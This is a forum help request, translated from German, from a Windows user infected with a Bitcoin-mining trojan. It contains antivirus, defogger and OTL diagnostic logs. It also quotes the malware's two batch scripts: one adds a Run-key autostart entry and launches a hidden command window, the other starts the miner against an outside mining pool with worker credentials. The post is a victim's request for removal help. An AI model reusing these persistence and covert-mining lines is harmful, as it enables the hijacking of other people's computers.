Trojan.Bitminer "C:\Users\***\AppData\Roaming\pejo\scvhost.exe"

Hello,
The first time I noticed that something might be wrong was when, after starting Windows 7, a DOS window appeared with the title bar "C:\Windows\system32\cmd.exe" and, as the only line in the window, "Der Vorgang wurde erfolgreich ausgeführt" (the operation completed successfully).
Malwarebytes Anti-Malware then found the following file to be infected and quarantined it:
"C:\Users\***\AppData\Roaming\pejo\scvhost.exe"
Here is the log of the quick scan that produced that result: Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 14:56:57
mbam-log-2013-06-02 (14-56-57).txt
Art des Suchlaufs: Quick-Scan
Durchsuchte Objekte: 220542
Laufzeit: 7 Minute(n), 40 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 1
Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)
Infizierte Dateien:
c:\Users\ant\AppData\Roaming\pejo\scvhost.exe (Trojan.BitMiner) -> Quarantined and deleted successfully.

After the reboot, however, the DOS window opened again, so I had a look at the Startup tab in msconfig. For some reason the entry "C:\Users\***\AppData\Roaming\pejo\vifier.bat" struck me as odd and I tried to dig into it a little. Via Google I didn't really find much about it, except that it might possibly have something to do with a "Bundestrojaner" (the German government's "federal trojan")!? Or maybe just a "Bitcoin miner"!?
A full scan with Malwarebytes, however, came back with nothing: Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 16:45:22
mbam-log-2013-06-02 (16-45-22).txt
Art des Suchlaufs: Vollständiger Suchlauf (C:\|)
Durchsuchte Objekte: 358343
Laufzeit: 1 Stunde(n), 21 Minute(n), 45 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0
Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)
Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

So I had a look at the .bat myself:
*\pejo\vifier.bat: Code:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v pejo /d "\"%appdata%\pejo\vifier.bat\"" /f
cd "%appdata%\pejo\"
chp cmd /c ""%appdata%\pejo\1.bat""

*\pejo\1.bat: Code:
scvhost.exe -o hxxp://us1.eclipsemc.com:8337 -u melody_6 -p pavlaka -k diablo
Since the infected scvhost.exe is mentioned in 1.bat, I now assume that this pejo directory has something to do with the whole thing... Here is the list of files in the directory: Code:
1.bat
API.class
chp.exe
diablo121016.cl
diakgcn121016.cl
libblkmaker-jansson-0.1-0.dll
libblkmaker-0.1-0.dll
libcurl-4.dll
libjansson-4.dll
libusb-1.0.dll
miner.php
pdcurses.dll
phatk121016.cl
poclbm121016.cl
pthreadGC2.dll
scrypt121016.cl
vifier.bat
zlib1.dll

Here are the log/TXT files from the programs in your instructions:
defogger: Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 17:09 on 02/06/2013 (***)
Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.
Checking for services/drivers...
Unable to read sptd.sys
SPTD -> Disabled (Service running -> reboot required)
-=E.O.F=-

OTL.txt: Code:
OTL logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT
Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
PRC - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) -- C:\Program Files\NetDrive\ndsvc.exe
PRC - [2012.08.01 10:23:39 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
PRC - [2012.07.09 20:51:26 | 001,672,008 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyserver.exe
PRC - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe
PRC - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe
PRC - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe
PRC - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\sched.exe
PRC - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe
PRC - [2012.05.09 07:18:42 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
PRC - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE
PRC - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe
PRC - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe
PRC - [2009.04.11 08:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe
PRC - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eNet\eNet Service.exe
PRC - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe
PRC - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () -- C:\Acer\Mobility Center\MobilityService.exe
PRC - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe
PRC - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe
PRC - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
PRC - [2007.09.07 21:35:10 | 000,102,400 | ---- | M] (Synaptics, Inc.) -- C:\Program Files\Synaptics\SynTP\SynTPStart.exe
========== Modules (No Company Name) ==========
MOD - [2011.06.24 22:56:36 | 000,087,328 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2011.06.24 22:56:14 | 001,241,888 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2010.03.15 11:28:22 | 000,141,824 | ---- | M] () -- C:\Program Files\WinRAR\RarExt.dll
MOD - [2008.03.10 08:01:06 | 000,159,744 | ---- | M] () -- C:\Windows\System32\atitmmxx.dll
========== Services (SafeList) ==========
SRV - [2013.05.14 21:03:15 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) [Auto | Running] -- C:\Program Files\NetDrive\ndsvc.exe -- (ndsvc)
SRV - [2012.07.13 13:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe -- (TwonkyProxy)
SRV - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe -- (TwonkyWebDav)
SRV - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe -- (TwonkyServer)
SRV - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)
SRV - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)
SRV - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2011.08.13 01:56:34 | 000,411,432 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2011.02.28 19:44:14 | 000,183,560 | ---- | M] (Microsoft Corporation.) [On_Demand | Stopped] -- C:\Program Files\Microsoft\BingBar\BBSvc.EXE -- (BBSvc)
SRV - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE -- (SeaPort)
SRV - [2011.01.26 18:00:16 | 000,284,672 | ---- | M] (Advanced Micro Devices, Inc.) [Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service)
SRV - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) [Auto | Running] -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe -- (AMD Reservation Manager)
SRV - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe -- (AVerScheduleService)
SRV - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe -- (AVerRemote)
SRV - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eNet\eNet Service.exe -- (eNet Service)
SRV - [2008.01.21 04:23:32 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) [Auto | Running] -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe -- (eDataSecurity Service)
SRV - [2007.12.19 19:09:22 | 000,024,576 | ---- | M] () [Auto | Stopped] -- C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe -- (eSettingsService)
SRV - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () [Auto | Running] -- C:\Acer\Mobility Center\MobilityService.exe -- (MobilityService)
SRV - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe -- (eLockService)
SRV - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) [Auto | Running] -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe -- (WMIService)
SRV - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
========== Driver Services (SafeList) ==========
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - [2013.03.06 15:43:15 | 000,048,352 | ---- | M] (Bdrive Inc.) [File_System | On_Demand | Running] -- C:\Program Files\NetDrive\NDFS.sys -- (ndfs)
DRV - [2012.09.19 11:02:06 | 000,181,344 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudmdm.sys -- (ssudmdm)
DRV - [2012.07.30 13:32:08 | 000,083,168 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudbus.sys -- (dg_ssudbus)
DRV - [2012.05.09 07:18:43 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)
DRV - [2012.05.09 07:18:43 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)
DRV - [2011.10.19 17:56:15 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)
DRV - [2011.08.31 17:00:50 | 000,022,216 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\System32\drivers\mbam.sys -- (MBAMProtector)
DRV - [2010.11.21 17:30:51 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) [Kernel | Disabled | Stopped] -- C:\Windows\System32\drivers\sptd.sys -- (sptd)
DRV - [2010.06.17 16:14:27 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)
DRV - [2010.02.18 09:18:22 | 000,037,944 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\amdiox86.sys -- (amdiox86)
DRV - [2009.10.19 04:26:08 | 000,474,880 | ---- | M] (AVerMedia TECHNOLOGIES, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AVerAF35.sys -- (AVerAF35)
DRV - [2008.11.19 17:09:08 | 000,013,056 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\lgusbbus.sys -- (usbbus)
DRV - [2008.03.10 08:58:40 | 003,533,824 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)
DRV - [2008.01.21 04:23:21 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV - [2007.07.03 11:05:20 | 000,015,392 | ---- | M] (Acer, Inc.) [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2007.04.03 20:04:28 | 000,039,680 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2media.sys -- (O2MDRDR)
DRV - [2007.04.03 02:11:08 | 000,035,712 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2sd.sys -- (O2SDRDR)
DRV - [2006.11.29 02:44:52 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio)
DRV - [2006.10.30 21:23:12 | 000,007,680 | ---- | M] (ATI Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie)
DRV - [2006.04.07 17:06:38 | 000,038,496 | ---- | M] (OLYMPUS IMAGING CORP.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VNUSB.sys -- (VNUSB)
DRV - [2005.10.31 12:28:04 | 000,015,616 | ---- | M] (WideView Technology Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ECS_Loader_220.sys -- (ECS_Loader_220)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520
IE - HKLM\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.web.de/home
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://go.web.de/tab2 [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 33 0B F0 16 3E C2 CA 01 [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{111F1281-BDAA-4B8D-9AF9-8BB376A8BDED}: "URL" = hxxp://www.bing.com/search?FORM=IEFM1&q={searchTerms}&src={referrer:source?}
IE - HKCU\..\SearchScopes\{4A9BB00F-DA96-4E4D-A9CF-45117AB9D4D2}: "URL" = hxxp://go.web.de/suchbox/smartshopping/?searchText={searchTerms}&mc=searchplugin@suche@msie.suche@preisvergleich
IE - HKCU\..\SearchScopes\{66227E65-9D58-4B37-87EC-09E6BF4C24AB}: "URL" = hxxp://go.web.de/suchbox/ebay?query={searchTerms}
IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://go.web.de/suchbox/google?q={searchTerms}&rlz=1I7ADRA_de
IE - HKCU\..\SearchScopes\{84EE36C5-9201-46D0-A633-5CFCE7FF6552}: "URL" = hxxp://suche.gmx.net/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin
IE - HKCU\..\SearchScopes\{96C8FC5C-438D-405E-BC5E-8F7F45AA3BCA}: "URL" = hxxp://go.1und1.de/suchbox/amazon?tag=1und1icon-21&field-keywords={searchTerms}
IE - HKCU\..\SearchScopes\{ADDF20CC-BACE-48CB-A300-6C29BFE0E987}: "URL" = hxxp://suche.web.de/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin
IE - HKCU\..\SearchScopes\{C1BF8F08-E17F-4955-840D-D97E1187C1D3}: "URL" = hxxp://de.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&type=971163&p={searchTerms}
IE - HKCU\..\SearchScopes\{C821A797-ED91-43F3-A1FF-3BE6E0F679A4}: "URL" = hxxp://go.1und1.de/suchbox/1und1suche?su={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>
========== FireFox ==========
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2012.05.21 20:28:48 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2013.05.19 09:30:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{8A9386B4-E958-4c4c-ADF4-8F26DB3E4829}: C:\Program Files\PriceGong\2.6.11\FF [2013.05.15 20:53:03 | 000,000,000 | ---D | M]
========== Chrome ==========
CHR - homepage: hxxp://www.google.com/
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}
CHR - homepage: hxxp://www.google.com/
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\PepperFlash\pepflashplayer.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\gcswf32.dll
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: Java Deployment Toolkit 6.0.210.7 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll
CHR - plugin: Java(TM) Platform SE 6 U21 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL
CHR - plugin: Microsoft Office Live Plug-in for Firefox (Enabled) = C:\Program Files\Microsoft\Office Live\npOLW.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Picasa (Enabled) = C:\Program Files\Google\Picasa3\npPicasa3.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
O1 HOSTS File: ([2006.09.18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (PriceGong - Price Comparison) - {1631550F-191D-4826-B069-D9439253D926} - C:\Program Files\PriceGong\2.6.11\PriceGongIE.dll (PriceGong)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O2 - BHO: (ShowBarObj Class) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - C:\Acer\Empowering Technology\eDataSecurity\x86\ActiveToolBand.dll (HiTRUST)
O2 - BHO: (Partner BHO Class) - {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} - C:\ProgramData\Partner\partner.dll (Google Inc.)
